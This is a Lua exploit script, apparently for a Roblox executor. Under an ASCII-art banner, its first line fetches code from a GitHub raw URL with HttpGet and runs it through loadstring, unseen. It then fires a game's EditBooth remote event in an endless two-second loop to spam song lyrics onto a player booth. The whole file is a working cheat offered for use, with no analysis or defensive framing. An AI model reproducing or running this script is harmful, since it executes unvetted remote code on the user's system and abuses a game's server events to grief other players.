--[[
  ______   ____    ____  _______ .______       __  ___  __   __       __      
 /  __  \  \   \  /   / |   ____||   _  \     |  |/  / /_ | |  |     |  |     
|  |  |  |  \   \/   /  |  |__   |  |_)  |    |  '  /   | | |  |     |  |     
|  |  |  |   \      /   |   __|  |      /     |    <    | | |  |     |  |     
|  `--'  |    \    /    |  |____ |  |\  \----.|  .  \   | | |  `----.|  `----.
 \______/      \__/     |_______|| _| `._____||__|\__\  |_| |_______||_______|
]]
loadstring(game:HttpGet("https://raw.githubusercontent.com/typical-overk1ll/scripts/main/Invite",true))()
function msg(text)
    local A_1 = text
local A_2 = "booth"
local event = game:GetService("ReplicatedStorage").Events.EditBooth
event:FireServer(A_1, A_2)
end
while wait(2) do
    msg("We're no strangers to love")
    wait(2)
    msg("You know the rules, and so do I")
      wait(2)
    msg("A full commitment's what I'm thinking of")
     wait(2)
    msg("You wouldn't get this from any other guy")
    wait(2)
    msg("I just wanna tell you how I'm feeling")
    wait(2)
    msg("Gotta make you understand")
    wait(2)
    msg("Never gonna give you up")
    wait(2)
    msg("Never gonna let you down")
      wait(2)
    msg("Never gonna run around and desert you")
     wait(2)
    msg("Never gonna make you cry")
    wait(2)
    msg("Never gonna say goodbye")
    wait(2)
    msg("Never gonna tell a lie and hurt you")
     wait(2)
    msg("We've known each other for so long")
      wait(2)
    msg("Your heart's been aching but you're too shy to say it")
     wait(2)
    msg("Inside we both know what's been going on")
    wait(2)
    msg("We know the game and we're gonna play it")
    wait(2)
    msg("And if you ask me how I'm feeling")
    wait(2)
    msg("Don't tell me you're too blind to see")
     wait(2)
    msg("Never gonna give you up")
    wait(2)
    msg("Never gonna let you down")
      wait(2)
    msg("Never gonna run around and desert you")
     wait(2)
    msg("Never gonna make you cry")
    wait(2)
    msg("Never gonna say goodbye")
    wait(2)
    msg("Never gonna tell a lie and hurt you")
     wait(2)
    msg("Never gonna give you up")
    wait(2)
    msg("Never gonna let you down")
      wait(2)
    msg("Never gonna run around and desert you")
     wait(2)
    msg("Never gonna make you cry")
    wait(2)
    msg("Never gonna say goodbye")
    wait(2)
    msg("Never gonna tell a lie and hurt you")
    wait(2)
    msg("Never gonna give, never gonna give (Give you up)")
     wait(2)
    msg("We've known each other for so long")
      wait(2)
    msg("Your heart's been aching but you're too shy to say it")
     wait(2)
    msg("Inside we both know what's been going on")
    wait(2)
    msg("We know the game and we're gonna play it")
     wait(2)
    msg("I just wanna tell you how I'm feeling")
      wait(2)
    msg("Gotta make you understand")
     wait(2)
    msg("Never gonna give you up")
    wait(2)
    msg("Never gonna let you down")
      wait(2)
    msg("Never gonna run around and desert you")
     wait(2)
    msg("Never gonna make you cry")
    wait(2)
    msg("Never gonna say goodbye")
    wait(2)
    msg("Never gonna tell a lie and hurt you")
     wait(2)
    msg("Never gonna give you up")
    wait(2)
    msg("Never gonna let you down")
      wait(2)
    msg("Never gonna run around and desert you")
     wait(2)
    msg("Never gonna make you cry")
    wait(2)
    msg("Never gonna say goodbye")
    wait(2)
    msg("Never gonna tell a lie and hurt you")
    wait(2)
     msg("Never gonna give you up")
    wait(2)
    msg("Never gonna let you down")
      wait(2)
    msg("Never gonna run around and desert you")
     wait(2)
    msg("Never gonna make you cry")
    wait(2)
    msg("Never gonna say goodbye")
    end
